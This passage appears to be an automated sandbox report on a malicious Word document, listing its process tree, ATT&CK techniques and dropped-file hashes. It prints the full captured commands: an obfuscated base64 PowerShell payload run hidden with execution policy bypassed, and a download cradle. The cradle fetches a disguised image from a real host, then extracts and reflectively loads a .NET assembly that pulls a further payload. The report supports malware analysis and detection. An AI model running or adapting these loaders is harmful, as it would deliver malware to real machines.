᧸ ₲BJ᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲Bl᭸ ㇡ ⠿ ᧸ ₲Hg᭸ ㇡ ⠿ ᧸ ₲KQ᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲Hs᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲k᭸ ㇡ ⠿ ᧸ ₲HM᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲Bh᭸ ㇡ ⠿ ᧸ ₲HI᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲BJ᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲Bl᭸ ㇡ ⠿ ᧸ ₲Hg᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲r᭸ ㇡ ⠿ ᧸ ₲D0᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲k᭸ ㇡ ⠿ ᧸ ₲HM᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲Bh᭸ ㇡ ⠿ ᧸ ₲HI᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲BG᭸ ㇡ ⠿ ᧸ ₲Gw᭸ ㇡ ⠿ ᧸ ₲YQBn᭸ ㇡ ⠿ ᧸ ₲C4᭸ ㇡ ⠿ ᧸ ₲T᭸ ㇡ ⠿ ᧸ ₲Bl᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲ZwB0᭸ ㇡ ⠿ ᧸ ₲Gg᭸ ㇡ ⠿ ᧸ ₲Ow᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲CQ᭸ ㇡ ⠿ ᧸ ₲YgBh᭸ ㇡ ⠿ ᧸ ₲HM᭸ ㇡ ⠿ ᧸ ₲ZQ᭸ ㇡ ⠿ ᧸ ₲2᭸ ㇡ ⠿ ᧸ ₲DQ᭸ ㇡ ⠿ ᧸ ₲T᭸ ㇡ ⠿ ᧸ ₲Bl᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲ZwB0᭸ ㇡ ⠿ ᧸ ₲Gg᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲9᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲J᭸ ㇡ ⠿ ᧸ ₲Bl᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲BJ᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲Bl᭸ ㇡ ⠿ ᧸ ₲Hg᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲t᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲J᭸ ㇡ ⠿ ᧸ ₲Bz᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲YQBy᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲SQBu᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲ZQB4᭸ ㇡ ⠿ ᧸ ₲Ds᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲k᭸ ㇡ ⠿ ᧸ ₲GI᭸ ㇡ ⠿ ᧸ ₲YQBz᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲Ng᭸ ㇡ ⠿ ᧸ ₲0᭸ ㇡ ⠿ ᧸ ₲EM᭸ ㇡ ⠿ ᧸ ₲bwBt᭸ ㇡ ⠿ ᧸ ₲G0᭸ ㇡ ⠿ ᧸ ₲YQBu᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲9᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲J᭸ ㇡ ⠿ ᧸ ₲Bp᭸ ㇡ ⠿ ᧸ ₲G0᭸ ㇡ ⠿ ᧸ ₲YQBn᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲V᭸ ㇡ ⠿ ᧸ ₲Bl᭸ ㇡ ⠿ ᧸ ₲Hg᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲u᭸ ㇡ ⠿ ᧸ ₲FM᭸ ㇡ ⠿ ᧸ ₲dQBi᭸ ㇡ ⠿ ᧸ ₲HM᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲By᭸ ㇡ ⠿ ᧸ ₲Gk᭸ ㇡ ⠿ ᧸ ₲bgBn᭸ ㇡ ⠿ ᧸ ₲Cg᭸ ㇡ ⠿ ᧸ ₲J᭸ ㇡ ⠿ ᧸ ₲Bz᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲YQBy᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲SQBu᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲ZQB4᭸ ㇡ ⠿ ᧸ ₲Cw᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲k᭸ ㇡ ⠿ ᧸ ₲GI᭸ ㇡ ⠿ ᧸ ₲YQBz᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲Ng᭸ ㇡ ⠿ ᧸ ₲0᭸ ㇡ ⠿ ᧸ ₲Ew᭸ ㇡ ⠿ ᧸ ₲ZQBu᭸ ㇡ ⠿ ᧸ ₲Gc᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲Bo᭸ ㇡ ⠿ ᧸ ₲Ck᭸ ㇡ ⠿ ᧸ ₲Ow᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲CQ᭸ ㇡ ⠿ ᧸ ₲YwBv᭸ ㇡ ⠿ ᧸ ₲G0᭸ ㇡ ⠿ ᧸ ₲bQBh᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲BC᭸ ㇡ ⠿ ᧸ ₲Hk᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲Bl᭸ ㇡ ⠿ ᧸ ₲HM᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲9᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲WwBT᭸ ㇡ ⠿ ᧸ ₲Hk᭸ ㇡ ⠿ ᧸ ₲cwB0᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲bQ᭸ ㇡ ⠿ ᧸ ₲u᭸ ㇡ ⠿ ᧸ ₲EM᭸ ㇡ ⠿ ᧸ ₲bwBu᭸ ㇡ ⠿ ᧸ ₲HY᭸ ㇡ ⠿ ᧸ ₲ZQBy᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲XQ᭸ ㇡ ⠿ ᧸ ₲6᭸ ㇡ ⠿ ᧸ ₲Do᭸ ㇡ ⠿ ᧸ ₲RgBy᭸ ㇡ ⠿ ᧸ ₲G8᭸ ㇡ ⠿ ᧸ ₲bQBC᭸ ㇡ ⠿ ᧸ ₲GE᭸ ㇡ ⠿ ᧸ ₲cwBl᭸ ㇡ ⠿ ᧸ ₲DY᭸ ㇡ ⠿ ᧸ ₲N᭸ ㇡ ⠿ ᧸ ₲BT᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲cgBp᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲Zw᭸ ㇡ ⠿ ᧸ ₲o᭸ ㇡ ⠿ ᧸ ₲CQ᭸ ㇡ ⠿ ᧸ ₲YgBh᭸ ㇡ ⠿ ᧸ ₲HM᭸ ㇡ ⠿ ᧸ ₲ZQ᭸ ㇡ ⠿ ᧸ ₲2᭸ ㇡ ⠿ ᧸ ₲DQ᭸ ㇡ ⠿ ᧸ ₲QwBv᭸ ㇡ ⠿ ᧸ ₲G0᭸ ㇡ ⠿ ᧸ ₲bQBh᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲p᭸ ㇡ ⠿ ᧸ ₲Ds᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲k᭸ ㇡ ⠿ ᧸ ₲Gw᭸ ㇡ ⠿ ᧸ ₲bwBh᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲ZQBk᭸ ㇡ ⠿ ᧸ ₲EE᭸ ㇡ ⠿ ᧸ ₲cwBz᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲bQBi᭸ ㇡ ⠿ ᧸ ₲Gw᭸ ㇡ ⠿ ᧸ ₲eQ᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲D0᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲Bb᭸ ㇡ ⠿ ᧸ ₲FM᭸ ㇡ ⠿ ᧸ ₲eQBz᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲ZQBt᭸ ㇡ ⠿ ᧸ ₲C4᭸ ㇡ ⠿ ᧸ ₲UgBl᭸ ㇡ ⠿ ᧸ ₲GY᭸ ㇡ ⠿ ᧸ ₲b᭸ ㇡ ⠿ ᧸ ₲Bl᭸ ㇡ ⠿ ᧸ ₲GM᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲Bp᭸ ㇡ ⠿ ᧸ ₲G8᭸ ㇡ ⠿ ᧸ ₲bg᭸ ㇡ ⠿ ᧸ ₲u᭸ ㇡ ⠿ ᧸ ₲EE᭸ ㇡ ⠿ ᧸ ₲cwBz᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲bQBi᭸ ㇡ ⠿ ᧸ ₲Gw᭸ ㇡ ⠿ ᧸ ₲eQBd᭸ ㇡ ⠿ ᧸ ₲Do᭸ ㇡ ⠿ ᧸ ₲OgBM᭸ ㇡ ⠿ ᧸ ₲G8᭸ ㇡ ⠿ ᧸ ₲YQBk᭸ ㇡ ⠿ ᧸ ₲Cg᭸ ㇡ ⠿ ᧸ ₲J᭸ ㇡ ⠿ ᧸ ₲Bj᭸ ㇡ ⠿ ᧸ ₲G8᭸ ㇡ ⠿ ᧸ ₲bQBt᭸ ㇡ ⠿ ᧸ ₲GE᭸ ㇡ ⠿ ᧸ ₲bgBk᭸ ㇡ ⠿ ᧸ ₲EI᭸ ㇡ ⠿ ᧸ ₲eQB0᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲cw᭸ ㇡ ⠿ ᧸ ₲p᭸ ㇡ ⠿ ᧸ ₲Ds᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲k᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲eQBw᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲9᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲J᭸ ㇡ ⠿ ᧸ ₲Bs᭸ ㇡ ⠿ ᧸ ₲G8᭸ ㇡ ⠿ ᧸ ₲YQBk᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲BB᭸ ㇡ ⠿ ᧸ ₲HM᭸ ㇡ ⠿ ᧸ ₲cwBl᭸ ㇡ ⠿ ᧸ ₲G0᭸ ㇡ ⠿ ᧸ ₲YgBs᭸ ㇡ ⠿ ᧸ ₲Hk᭸ ㇡ ⠿ ᧸ ₲LgBH᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲BU᭸ ㇡ ⠿ ᧸ ₲Hk᭸ ㇡ ⠿ ᧸ ₲c᭸ ㇡ ⠿ ᧸ ₲Bl᭸ ㇡ ⠿ ᧸ ₲Cg᭸ ㇡ ⠿ ᧸ ₲JwBk᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲b᭸ ㇡ ⠿ ᧸ ₲Bp᭸ ㇡ ⠿ ᧸ ₲GI᭸ ㇡ ⠿ ᧸ ₲LgBJ᭸ ㇡ ⠿ ᧸ ₲E8᭸ ㇡ ⠿ ᧸ ₲LgBI᭸ ㇡ ⠿ ᧸ ₲G8᭸ ㇡ ⠿ ᧸ ₲bQBl᭸ ㇡ ⠿ ᧸ ₲Cc᭸ ㇡ ⠿ ᧸ ₲KQ᭸ ㇡ ⠿ ᧸ ₲7᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲J᭸ ㇡ ⠿ ᧸ ₲Bt᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲Bo᭸ ㇡ ⠿ ᧸ ₲G8᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲D0᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲k᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲eQBw᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲LgBH᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲BN᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲Bo᭸ ㇡ ⠿ ᧸ ₲G8᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲o᭸ ㇡ ⠿ ᧸ ₲Cc᭸ ㇡ ⠿ ᧸ ₲VgBB᭸ ㇡ ⠿ ᧸ ₲Ek᭸ ㇡ ⠿ ᧸ ₲Jw᭸ ㇡ ⠿ ᧸ ₲p᭸ ㇡ ⠿ ᧸ ₲C4᭸ ㇡ ⠿ ᧸ ₲SQBu᭸ ㇡ ⠿ ᧸ ₲HY᭸ ㇡ ⠿ ᧸ ₲bwBr᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲K᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲k᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲dQBs᭸ ㇡ ⠿ ᧸ ₲Gw᭸ ㇡ ⠿ ᧸ ₲L᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲Fs᭸ ㇡ ⠿ ᧸ ₲bwBi᭸ ㇡ ⠿ ᧸ ₲Go᭸ ㇡ ⠿ ᧸ ₲ZQBj᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲WwBd᭸ ㇡ ⠿ ᧸ ₲F0᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲o᭸ ㇡ ⠿ ᧸ ₲Cc᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲B4᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲LgBI᭸ ㇡ ⠿ ᧸ ₲Ec᭸ ㇡ ⠿ ᧸ ₲UgBV᭸ ㇡ ⠿ ᧸ ₲C8᭸ ㇡ ⠿ ᧸ ₲M᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲2᭸ ㇡ ⠿ ᧸ ₲DE᭸ ㇡ ⠿ ᧸ ₲Lw᭸ ㇡ ⠿ ᧸ ₲1᭸ ㇡ ⠿ ᧸ ₲DE᭸ ㇡ ⠿ ᧸ ₲Lg᭸ ㇡ ⠿ ᧸ ₲w᭸ ㇡ ⠿ ᧸ ₲DU᭸ ㇡ ⠿ ᧸ ₲MQ᭸ ㇡ ⠿ ᧸ ₲u᭸ ㇡ ⠿ ᧸ ₲D᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲MQ᭸ ㇡ ⠿ ᧸ ₲y᭸ ㇡ ⠿ ᧸ ₲C4᭸ ㇡ ⠿ ᧸ ₲Mg᭸ ㇡ ⠿ ᧸ ₲5᭸ ㇡ ⠿ ᧸ ₲DE᭸ ㇡ ⠿ ᧸ ₲Lw᭸ ㇡ ⠿ ᧸ ₲v᭸ ㇡ ⠿ ᧸ ₲Do᭸ ㇡ ⠿ ᧸ ₲c᭸ ㇡ ⠿ ᧸ ₲B0᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲a᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲n᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲L᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲Cc᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲Bl᭸ ㇡ ⠿ ᧸ ₲HM᭸ ㇡ ⠿ ᧸ ₲YQB0᭸ ㇡ ⠿ ᧸ ₲Gk᭸ ㇡ ⠿ ᧸ ₲dgBh᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲bw᭸ ㇡ ⠿ ᧸ ₲n᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲L᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲Cc᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲Bl᭸ ㇡ ⠿ ᧸ ₲HM᭸ ㇡ ⠿ ᧸ ₲YQB0᭸ ㇡ ⠿ ᧸ ₲Gk᭸ ㇡ ⠿ ᧸ ₲dgBh᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲bw᭸ ㇡ ⠿ ᧸ ₲n᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲L᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲Cc᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲Bl᭸ ㇡ ⠿ ᧸ ₲HM᭸ ㇡ ⠿ ᧸ ₲YQB0᭸ ㇡ ⠿ ᧸ ₲Gk᭸ ㇡ ⠿ ᧸ ₲dgBh᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲bw᭸ ㇡ ⠿ ᧸ ₲n᭸ ㇡ ⠿ ᧸ ₲Cw᭸ ㇡ ⠿ ᧸ ₲JwBS᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲ZwBB᭸ ㇡ ⠿ ᧸ ₲HM᭸ ㇡ ⠿ ᧸ ₲bQ᭸ ㇡ ⠿ ᧸ ₲n᭸ ㇡ ⠿ ᧸ ₲Cw᭸ ㇡ ⠿ ᧸ ₲JwBk᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲cwBh᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲aQB2᭸ ㇡ ⠿ ᧸ ₲GE᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲Bv᭸ ㇡ ⠿ ᧸ ₲Cc᭸ ㇡ ⠿ ᧸ ₲KQ᭸ ㇡ ⠿ ᧸ ₲p᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲fQ᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲H0᭸ ㇡ ⠿ ᧸ ₲';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('᭸ ㇡ ⠿ ᧸ ₲','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:668
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGRU/061/51.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{B5C48663-5C68-4AD1-897B-9A4EBA420456}.FSD

Filesize
128KB

MD5
475cf8e740840807d90b013cf0b89e3e

SHA1
60b082a969a759e448c71a4b61ac037aae36472d

SHA256
3304dec1c6fb5de25f4d7e6bc2d7f9d9e57b4da98f93be4b278a471b25c82d75

SHA512
cab310a0a9c965c90b343405d52455b9dc06567cd2d2185b28194fa0f20291509230d0c6c45650223d27a1cc6b967629bfc8a0f696bf4878c790e9a4927ed4fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
88b6cffbc0c58fba19443dcc723c46a0

SHA1
50b217a7d7e030855b1d57d58982c282be685f99

SHA256
663351a2c6f093454e006dcfa76e03cfed3c38fac05464058d04e3bf33ae24ff

SHA512
36db00e10413a89608a21f2c3aad4ad64db29ed6506630c0980db7117511636555133cd5b2c834c2b34db938adafb670653aae92509125e57751161f1ca44296

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{C0BF7595-7C26-444E-862C-5B5C0BBBF0FA}.FSD

Filesize
128KB

MD5
4057de8e44b22bd8aed86e9a980d9c8f

SHA1
9abf32c0722116dae81799d7ab0b2daee2e3e7bf

SHA256
cb8558f29d8c9f6550117cdf638abf17e040ec99a952e46f72f14bbeea855c14

SHA512
c9b0422d9ad890c0d899f9fdf0c73cda7003acde59745848a25b3f751d21c7995f31204ee61192a089cbb3d0c77bca7ff1c5b0307e54ebf83c8462e567063287

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X761FPIN\newgobuttuersemoothcandylevelbasedonmypckettounderstandhowmuchcandyineedtogiveufromtheheartwhosilvoe__________sheismygirleverilove[1].doc

Filesize
84KB

MD5
796cd99100b39174ec3591fb314486cc

SHA1
92e386b8602c7773f560e1cbb7a1c199c55a6d55

SHA256
e72b52d6fda30f2daf30d5b2cd24ab87acc15111a0abc2b4f722c183b5d569b1

SHA512
9eff03bd47fa8491ddee3613803afdedd5039d13e91fd813c03e7bb992b020ca9e5caf3bef0926909eea5a606e925d29ccaff9628b4cab9c52b7ff6fe5e138c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F3C65E9.emf

Filesize
78KB

MD5
97f3291db00b29c1537f6faabfcf8983

SHA1
38ac80147123d212b5923160c7f29b93c25e885c

SHA256
6f6e805c9473d6b4c0aec3b082cbc7e782b6c56a4d0048ef5902bb3ed8a8965c

SHA512
ec3ccb5b3ab053968fa47048f6915de82e85bf1a4313eb479d34a9dbf4cd20ea059553c5f7407f8710da642f01356bc86411a10809575b286f43969d49a6cad0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A7822B88.emf

Filesize
38KB

MD5
a91d2fcd4ff20d165f2060b52b3be3d5

SHA1
3fa940d03823cf4d3c5c9148e2e17225cebe35e7

SHA256
dac9a2d5e3e466ce9b5d6f78a7448a58b3bef2a3b58c24287015cd74521bbd74

SHA512
386324885bb148793b281f499071cc5b7b42fdc7d10d6b722690523a3bba2492cead854691ac07c9784339a5fd0470e67fccd1609f5902792cfc646572ac5fa3

Download Submit
C:\Users\Admin\AppData\Local\Temp\{315C5BA0-6D09-4C20-90A0-D55C9C4CC816}

Filesize
128KB

MD5
dd4a9619da57e8494446a353b77b4d0b

SHA1
80b254596bc82d1cc529431af4ab5de048caa61d

SHA256
637ef97b24a5e122cb53f41b1c9063d611b0f612d9fdc9c73a1e1ec5da05683a

SHA512
82a4dbe0cd14caec4b250db75ccf75d39bec663257fedbd52f4286b597a2e860778c585ccbcdac021e0ce4157ce66bcf8a3c1f31452086e8b2a3fee3da7289ef

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
298B

MD5
fc1882b91b412fcd4069bdb510c48348

SHA1
6aab6abfd0473222aca927f817eddb650ce3e4b5

SHA256
34f1bda7c2dee0fb8b737a7c4c1a5e15a2ac7d71b2ad6834c5acc3531ee9cd60

SHA512
f680c68ed2d57cc2e5aad5ae2e8918b4af5d5c935de37a3d0ee177d772bee9d1de5d936d86ee0b7ecd44a1b4662c46a2a67f39d396bce419fad5b1249587264d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
d8c896a4c192b569356c95f529809129

SHA1
65e85dc3389e959d2102aa09090125a13a57469e

SHA256
d6b06c1efac20dd0bf9c03b70c9753861621ea35f3d9fd525395e6f37ae76375

SHA512
b939292373ef35ff4370bf0a0fb06ceba67e41d1557721c56407996525835ca7f1343cdf9eb369c31e0542bd987ed413f0cf048f47d706dd28473b79e7368d8a

Download Submit
C:\Users\Admin\AppData\Roaming\buttercreamnewthingsbetterw.vBS

